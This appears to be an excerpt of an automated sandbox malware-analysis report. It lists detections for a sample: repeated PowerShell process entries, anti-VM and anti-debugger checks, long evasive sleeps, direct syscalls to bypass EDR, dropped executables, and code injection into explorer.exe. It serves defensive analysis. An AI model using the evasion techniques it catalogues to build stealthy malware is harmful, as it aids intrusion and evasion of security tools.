Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\DZIPR.exe API/Special instruction interceptor: Address: 6C5B7C44
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe API/Special instruction interceptor: Address: 6C5B7C44
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe API/Special instruction interceptor: Address: 6C5B7945
Source: C:\Windows\SysWOW64\cmd.exe API/Special instruction interceptor: Address: 6C5B3B54
Source: C:\Windows\SysWOW64\explorer.exe API/Special instruction interceptor: Address: 8FA317
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3631 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4211 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3046 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2607 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4872 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2554 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7635 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2050 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qapuwvr Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\demhwk Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gps Jump to dropped file
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\DZIPR.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\DZIPR.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Found large amount of non-executed APIs
Source: C:\Users\user\DZIPR.exe API coverage: 4.4 %
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe API coverage: 4.6 %
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe API coverage: 3.9 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516 Thread sleep count: 3631 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4188 Thread sleep count: 4211 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3000 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1476 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3820 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3220 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6312 Thread sleep count: 3046 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6312 Thread sleep count: 2607 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3004 Thread sleep time: -9223372036854770s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5896 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6636 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6124 Thread sleep count: 4872 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2064 Thread sleep time: -9223372036854770s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7016 Thread sleep count: 2554 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5616 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5956 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5044 Thread sleep count: 7635 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4864 Thread sleep count: 2050 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6284 Thread sleep time: -22136092888451448s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5692 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4392 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime, 16_2_0040301A
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z, 16_2_00402B79
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA4748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW, 17_2_6FA4748E
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C51748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW, 18_2_6C51748E
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAC748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW, 23_2_6FAC748E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: noreply@vmware.com0
Source: explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: http://www.vmware.com/0
Source: explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.1!0
Source: DZIPR.exe, 00000011.00000002.2343454264.000000000348B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6vmware
Source: AUGUST.exe, 00000010.00000002.2347238226.000000000051F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: http://www.vmware.com/0/
Source: svchost.exe, 00000015.00000002.3402164901.0000020619C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.3403620854.000002061F257000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.1
Source: explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.0
Source: C:\Users\user\DZIPR.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA53F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_6FA53F34
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow, 16_2_00406D5D
Contains functionality to read the PEB
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA45D78 mov eax, dword ptr fs:[00000030h] 17_2_6FA45D78
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA45CA0 mov eax, dword ptr fs:[00000030h] 17_2_6FA45CA0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C515CA0 mov eax, dword ptr fs:[00000030h] 18_2_6C515CA0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAC5CA0 mov eax, dword ptr fs:[00000030h] 23_2_6FAC5CA0
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA53F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_6FA53F34
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA5CE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_6FA5CE5C
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA58034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_6FA58034
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C52CE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_6C52CE5C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C523F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_2_6C523F34
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C528034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_2_6C528034
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAD3F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 23_2_6FAD3F34
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FADCE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 23_2_6FADCE5C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAD8034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 23_2_6FAD8034

HIPS / PFW / Operating System Protection Evasion
barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\DZIPR.exe NtQuerySystemInformation: Direct from: 0x6FA466A2 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe NtProtectVirtualMemory: Direct from: 0x6FB2E812 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe NtProtectVirtualMemory: Direct from: 0x6FB32B7A
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe NtProtectVirtualMemory: Direct from: 0x6C582A72 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe NtQuerySystemInformation: Direct from: 0x6C5166A2 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe NtQuerySystemInformation: Direct from: 0x6FAC66A2
Source: C:\Users\user\DZIPR.exe NtProtectVirtualMemory: Direct from: 0x77377B2E Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 1460 base: 8F79C0 value: 55 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 1460 base: 400000 value: 00 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 5388 base: 8F79C0 value: 55 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Memory written: PID: 5388 base: 400000 value: 00 Jump to behavior
